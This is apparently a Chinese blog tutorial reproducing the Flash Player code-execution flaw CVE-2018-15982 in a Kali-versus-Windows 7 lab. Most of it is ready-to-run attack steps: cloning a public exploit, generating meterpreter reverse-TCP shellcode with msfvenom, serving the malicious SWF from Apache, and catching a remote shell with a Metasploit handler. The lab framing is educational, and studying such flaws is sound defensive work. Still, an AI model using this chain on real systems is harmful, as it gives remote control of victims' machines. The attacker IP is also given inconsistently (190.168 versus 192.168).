温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

如何进行任意代码执行漏洞CVE-2018-15982复现

发布时间:2021-12-29 15:45:20 来源:亿速云 阅读:160 作者:柒染 栏目:网络安全

这篇文章给大家介绍如何进行任意代码执行漏洞CVE-2018-15982复现,内容非常详细,感兴趣的小伙伴们可以参考借鉴,希望对大家能有所帮助。

漏洞描述:

2018年11月29日,某团队在全球范围内第一时间发现一起针对俄罗斯的APT攻击行动,通过一份俄文内容的医院员工问卷文档,携带最新的Flash 0day漏洞和具有自毁功能的专属木马程序,该漏洞(CVE-2018-15982)允许攻击者恶意制作的Flash对象在受害者的计算机上执行代码,从而获取对系统命令行的访问权限。

受影响的版本:

AdobeFlash Player <= 31.0.0.153

AdobeFlash Player Installer<= 31.0.0.108

不受影响的版本:

AdobeFlash Player 32.0.0.101

AdobeFlash Player Installer 31.0.0.122

复现环境:

攻击机:Linux kali (IP:190.168.23.130)

靶机:Windows 7 X64 (IP:192.168.23.133)

复现过程:

git clone漏洞poc

git clone https://github.com/Ridter/CVE-2018-15982_EXP

如何进行任意代码执行漏洞CVE-2018-15982复现

创建payload程序

msfvenom -p windows/meterpreter/reverse_tcp_rc4RC4PASSWORD=ZALE LPORT=4444 LHOST=192.168.23.130 -f raw > 86.bin

msfvenom -p windows/meterpreter/reverse_tcp_rc4RC4PASSWORD=ZALE LPORT=4444 LHOST=192.168.23.130 -f raw > 64.bin

如何进行任意代码执行漏洞CVE-2018-15982复现

会生成两个bin文件,分别为86bin和64bin

poc执行并开启http

生成poc

cp *.bin CVE-2018-15982_EXP/

cd CVE-2018-15982_EXP/

python CVE_2018_15982.py -i 86.bin -I 64.bin

如何进行任意代码执行漏洞CVE-2018-15982复现

开启web服务

service apache2 start

cp index.html /var/www/html/

cp exploit.swf /var/www/html/

如何进行任意代码执行漏洞CVE-2018-15982复现

msf监听

msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp_rc4

set lport 4444

set lhost 192.168.23.130

set RC4PASSWORD zale

run

如何进行任意代码执行漏洞CVE-2018-15982复现

通过靶机访问http://192.168.23.130/index.html

如何进行任意代码执行漏洞CVE-2018-15982复现

可以看到返回shell

如何进行任意代码执行漏洞CVE-2018-15982复现

关于如何进行任意代码执行漏洞CVE-2018-15982复现就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。

向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

AI